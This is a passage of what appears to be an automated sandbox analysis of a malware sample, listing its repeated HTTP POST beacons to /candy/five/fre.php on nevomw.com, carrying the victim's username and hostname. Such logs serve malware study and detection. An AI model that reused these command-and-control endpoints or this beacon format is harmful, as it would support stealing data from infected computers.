                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:38.234414101 CET1452OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:38.308756113 CET1453INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:38 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            121192.168.2.64986445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:38.602222919 CET1455OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:38.655989885 CET1455OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:38.728997946 CET1456INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:38 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            122192.168.2.64986645.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:38.961338997 CET1462OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:39.015393019 CET1462OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:39.091332912 CET1465INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:39 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            123192.168.2.64986745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:39.390388966 CET1471OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:39.443120956 CET1471OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:39.517182112 CET1472INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:39 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            124192.168.2.64986945.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:39.815212011 CET1477OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:39.867501974 CET1478OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:39.940459967 CET1481INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:39 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            125192.168.2.64987045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:40.305916071 CET1487OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:40.358675003 CET1487OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:40.432230949 CET1487INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:40 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            126192.168.2.64987145.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:40.669919968 CET1488OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:40.722479105 CET1488OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:40.795722961 CET1489INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:40 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            127192.168.2.64987245.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:41.124373913 CET1490OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:41.197284937 CET1490OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:41.271989107 CET1490INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:41 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            128192.168.2.64987345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:41.506474018 CET1491OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:41.558218956 CET1491OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:41.630264044 CET1492INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:41 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            129192.168.2.64987445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:41.908529997 CET1493OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:41.961838007 CET1493OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:42.037555933 CET1493INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:42 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            13192.168.2.64972645.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:48.489829063 CET89OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:48.542445898 CET89OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:48.616770983 CET90INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:48 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            130192.168.2.64987545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:42.363986015 CET1494OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:42.648721933 CET1494OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:42.961201906 CET1495OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:43.570696115 CET1495OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:44.446561098 CET1496INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:44 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            131192.168.2.64987645.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:44.731017113 CET1497OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:44.783736944 CET1497OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:44.857261896 CET1497INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:44 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            132192.168.2.64987745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:45.110817909 CET1498OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:45.163388014 CET1498OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:45.239439011 CET1499INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:45 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            133192.168.2.64987845.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:45.530514956 CET1499OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:45.593251944 CET1500OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:45.675241947 CET1500INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:45 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            134192.168.2.64987945.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:45.971009970 CET1501OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:46.022999048 CET1501OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:46.096854925 CET1502INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:46 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            135192.168.2.64988045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:46.394583941 CET1502OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:46.447155952 CET1503OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:46.522598028 CET1503INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:46 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            136192.168.2.64988145.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:46.812716961 CET1504OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:46.866413116 CET1504OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:46.941849947 CET1504INHTTP/1.1 404 Not Found
                                            Server: nginx
